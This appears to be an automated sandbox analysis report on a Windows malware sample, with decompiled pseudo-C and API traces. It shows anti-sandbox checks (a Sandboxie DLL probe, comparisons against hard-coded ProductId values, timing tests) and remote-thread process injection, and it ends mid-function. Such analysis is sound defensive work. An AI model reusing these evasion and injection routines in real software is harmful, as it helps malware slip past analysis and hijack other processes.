                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B162
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B17C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B196
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1CA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1E4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1FE
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B218
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B232
                                    • GetTickCount.KERNEL32 ref: 0040B245
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B25C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B271
                                      • Part of subcall function 004052EC: GetModuleHandleA.KERNEL32(SbieDll.dll,00000000,0040B128,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 004052F4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B286
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B29B
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2C5
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2DA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2EF
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B304
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B319
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B32E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B343
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B358
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B36D
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B37D
                                    • GetTickCount.KERNEL32 ref: 0040B391
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B3B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$CountTick$HandleModule
                                    • String ID: @$@$@$@$@$@$@$@$@$@$@$@
                                    • API String ID: 835719275-1661000548
                                    • Opcode ID: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction ID: c7fc4875350585e80c75c2e3c7c0fe252a246f454c130cd5c6e6d9ea2ff417f9
                                    • Opcode Fuzzy Hash: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction Fuzzy Hash: 44618230964A006EEA107BA64A06B5F1749CF52349F84007BF9447F2D3DBFDCD415AAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403A58, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloadersynchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00403A58(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v20;
				long _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t15;
				long _t17;
				void* _t19;
				void* _t23;
				void* _t24;
				void* _t31;
				long _t32;
				void* _t33;
				DWORD* _t34;

				_t25 = __ecx;
				_t34 =  &_v24;
				_t33 = __ecx;
				_t31 = __edx;
				_t23 = __eax;
				_t32 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
				_v32 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
				_v36 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
				_t15 = E004037EC(_t23, _t23, _t25, _t33, _t31, 0); // executed
				_v20 = _t15;
				_t17 = E004037EC(_t23, _t23, _t25, _t31, _t31, 0); // executed
				_v24 = _t17;
				_t19 = E004038AC(_t23,  &_v36, E00403A28, 0, 0x14); // executed
				_t24 = _t19;
				if(_t24 != 0) {
					WaitForSingleObject(_t24, 0xffffffff);
					GetExitCodeThread(_t24, _t34);
					_t32 =  *_t34;
				}
				return _t32;
			}





















                                    0x00403a58
                                    0x00403a5c
                                    0x00403a5f
                                    0x00403a61
                                    0x00403a63
                                    0x00403a65
                                    0x00403a7c
                                    0x00403a95
                                    0x00403aae
                                    0x00403ab6
                                    0x00403abb
                                    0x00403ac3
                                    0x00403ac8
                                    0x00403adb
                                    0x00403ae0
                                    0x00403ae4
                                    0x00403ae9
                                    0x00403af0
                                    0x00403af5
                                    0x00403af5
                                    0x00403b01

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA), ref: 00403A71
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A77
                                    • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403A8A
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A90
                                    • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AA3
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403AA9
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AE9
                                    • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AF0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                    • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                    • API String ID: 3826234517-3123223305
                                    • Opcode ID: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction ID: 752bd04c13f1fb2c2637546d5d52efbb0f8f36bbb6a531361d47cc1ab833d988
                                    • Opcode Fuzzy Hash: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction Fuzzy Hash: 350157A0B443053AC610BE7A4C42A1BBE9C9BC472BB10893F7554B72D2DA7DDF0486AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004012B8, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004012B8(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				CHAR* _t8;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t8 = CharNextA(_t22); // executed
							_t22 = _t8;
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00402074(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}




















                                    0x004012bc
                                    0x004012be
                                    0x004012ca
                                    0x004012ca
                                    0x004012ca
                                    0x004012ce
                                    0x004012c8
                                    0x004012c8
                                    0x004012ca
                                    0x004012ca
                                    0x004012ce
                                    0x004012c8
                                    0x004012c8
                                    0x004012d4
                                    0x004012d7
                                    0x004012e4
                                    0x004012e6
                                    0x0040132d
                                    0x0040132d
                                    0x00401331
                                    0x00000000
                                    0x00000000
                                    0x004012ec
                                    0x00401320
                                    0x00401329
                                    0x0040132b
                                    0x00000000
                                    0x0040132b
                                    0x004012ef
                                    0x004012f4
                                    0x00401306
                                    0x00401306
                                    0x0040130a
                                    0x00000000
                                    0x00000000
                                    0x004012f9
                                    0x00401302
                                    0x00401304
                                    0x00401304
                                    0x00401313
                                    0x0040131b
                                    0x0040131b
                                    0x00401313
                                    0x00401337
                                    0x0040133c
                                    0x0040133e
                                    0x00401340
                                    0x00401395
                                    0x00401395
                                    0x00401399
                                    0x00000000
                                    0x00000000
                                    0x00401346
                                    0x00401381
                                    0x00401388
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040138a
                                    0x0040138a
                                    0x0040138c
                                    0x0040138f
                                    0x00401390
                                    0x00401391
                                    0x00000000
                                    0x0040138a
                                    0x0040134e
                                    0x00401367
                                    0x00401367
                                    0x0040136b
                                    0x00000000
                                    0x00000000
                                    0x00401353
                                    0x0040135a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040135c
                                    0x0040135c
                                    0x0040135e
                                    0x00401361
                                    0x00401362
                                    0x00401363
                                    0x0040135c
                                    0x00401374
                                    0x0040137c
                                    0x0040137c
                                    0x00401374
                                    0x004013a1
                                    0x004012df
                                    0x004012df
                                    0x00000000
                                    0x004012df
                                    0x004012d7

                                    APIs
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012EF
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012F9
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401316
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401320
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401349
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401353
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401377
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401381
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CharNext
                                    • String ID: "$"
                                    • API String ID: 3213498283-3758156766
                                    • Opcode ID: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction ID: 10f63cc1fa669f131e3f68441fcaf6b27babd9536db3b85d99238111a4137022
                                    • Opcode Fuzzy Hash: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction Fuzzy Hash: AE21C8446043C059EF316ABA08C07A667C54A1B308B5844BBDAC1FBBF7D47D4887C22E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403954, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 53libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00403954(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t20;
				void* _t22;
				void* _t30;
				intOrPtr _t37;
				void* _t40;
				void* _t43;

				_t30 = __ecx;
				_push(__ebx);
				_push(__esi);
				_v8 = __edx;
				_t40 = __eax;
				E00401F38(_v8);
				_push(_t43);
				_push(0x4039f2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff0;
				_v12 = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
				_v20 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
				_t20 = E004037EC(_t40, 0, _t30, E00401F48(_v8), __edi, _t40); // executed
				_v16 = _t20;
				_t22 = E004038AC(_t40,  &_v20, E00403920, 0, 0xc); // executed
				if(_t22 != 0) {
					CloseHandle(_t22);
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E004039F9);
				return E00401AC0( &_v8);
			}













                                    0x00403954
                                    0x0040395a
                                    0x0040395b
                                    0x0040395c
                                    0x0040395f
                                    0x00403964
                                    0x0040396b
                                    0x0040396c
                                    0x00403971
                                    0x00403974
                                    0x0040398e
                                    0x004039a6
                                    0x004039b5
                                    0x004039ba
                                    0x004039cb
                                    0x004039d2
                                    0x004039d5
                                    0x004039da
                                    0x004039de
                                    0x004039e1
                                    0x004039e4
                                    0x004039f1

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,004039F2), ref: 00403983
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403989
                                    • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 0040399B
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 004039A1
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 004039D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID: LoadLibraryA$Sleep$kernel32
                                    • API String ID: 3487503967-1813742806
                                    • Opcode ID: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction ID: 3dd456deda738439a9530638aaf5270c0b396e353cabac5e26cfdff56c824f73
                                    • Opcode Fuzzy Hash: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction Fuzzy Hash: 01012DB0B40605BED701EFA68C03A5E7EAC9B44716B60497BB400F72D1DB7C9F009A58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004053EC, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004053EC() {
				char _v264;
				int _v268;
				void* _v272;
				long _t6;
				int _t15;

				_t15 = 0;
				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
				if(_t6 == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
					if( &_v264 == "76487-644-3177037-23510") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}








                                    0x004053f3
                                    0x00405404
                                    0x0040540b
                                    0x0040540d
                                    0x0040542d
                                    0x0040543b
                                    0x0040543d
                                    0x0040543d
                                    0x0040543b
                                    0x00405443
                                    0x00405451

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405404
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000), ref: 0040542D
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405443
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004053FA
                                    • 76487-644-3177037-23510, xrefs: 00405436
                                    • ProductId, xrefs: 00405423
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-644-3177037-23510$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-300012159
                                    • Opcode ID: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction ID: 4dbc9aba648d7bbbf83a3552de5bfbcba9719c904d90c9cb7132e047c1fadaca
                                    • Opcode Fuzzy Hash: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction Fuzzy Hash: 30F08C706403007AE610EA90CC82FDB778CDB40715F50483AFA84FA1D1D6BDE9889A6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004054A4, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004054A4() {
				char _v264;
				int _v268;
				void* _v272;
				long _t6;
				int _t15;

				_t15 = 0;
				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
				if(_t6 == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
					if( &_v264 == "76487-337-8429955-22614") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272); // executed
				return _t15;
			}








                                    0x004054ab
                                    0x004054bc
                                    0x004054c3
                                    0x004054c5
                                    0x004054e5
                                    0x004054f3
                                    0x004054f5
                                    0x004054f5
                                    0x004054f3
                                    0x004054fb
                                    0x00405509

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054BC
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000), ref: 004054E5
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054FB
                                    Strings
                                    • 76487-337-8429955-22614, xrefs: 004054EE
                                    • ProductId, xrefs: 004054DB
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004054B2
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-337-8429955-22614$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-3593519172
                                    • Opcode ID: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction ID: 47032f9d578e649e4c59a246db62157aaca0609ee869790ecbc754fa5fe81585
                                    • Opcode Fuzzy Hash: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction Fuzzy Hash: A6F0A7703403007AD610DA94CC82F9B778CDB41714F50443AF944FA1C0D3BDE9489F2A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406B54, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 380fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E00406B54(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr* _t108;
				intOrPtr* _t109;
				intOrPtr* _t110;
				void* _t112;
				void* _t126;
				intOrPtr* _t143;
				void* _t154;
				void* _t166;
				CHAR* _t169;
				int _t172;
				int _t186;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				intOrPtr* _t193;
				intOrPtr* _t198;
				void* _t200;
				void* _t201;
				intOrPtr* _t204;
				intOrPtr* _t218;
				intOrPtr* _t226;
				intOrPtr* _t240;
				intOrPtr* _t248;
				intOrPtr* _t258;
				intOrPtr* _t272;
				intOrPtr* _t284;
				intOrPtr _t301;
				intOrPtr* _t313;
				void* _t314;
				intOrPtr* _t315;
				intOrPtr* _t317;
				void* _t321;
				intOrPtr* _t332;
				intOrPtr _t333;
				intOrPtr* _t334;
				intOrPtr* _t338;
				char _t340;
				intOrPtr _t351;
				CHAR* _t392;
				CHAR* _t394;
				intOrPtr _t396;
				intOrPtr _t397;
				void* _t402;

				_t393 = __esi;
				_t391 = __edi;
				_t396 = _t397;
				_t314 = 0xf;
				do {
					_push(0);
					_push(0);
					_t314 = _t314 - 1;
				} while (_t314 != 0);
				_push(_t314);
				_push(__esi);
				_push(__edi);
				_t313 = __edx;
				_v8 = __eax;
				E00401F38(_v8);
				_push(_t396);
				_push(0x407061);
				_push( *[fs:eax]);
				 *[fs:eax] = _t397;
				E00401B14(_t313, _v8);
				_t106 =  *0x40d1f0; // 0x40e890
				_t399 =  *_t106;
				if( *_t106 != 0) {
					_t107 =  *0x40d1f0; // 0x40e890
					__eflags =  *_t107 - 1;
					if(__eflags != 0) {
						_t108 =  *0x40d1f0; // 0x40e890
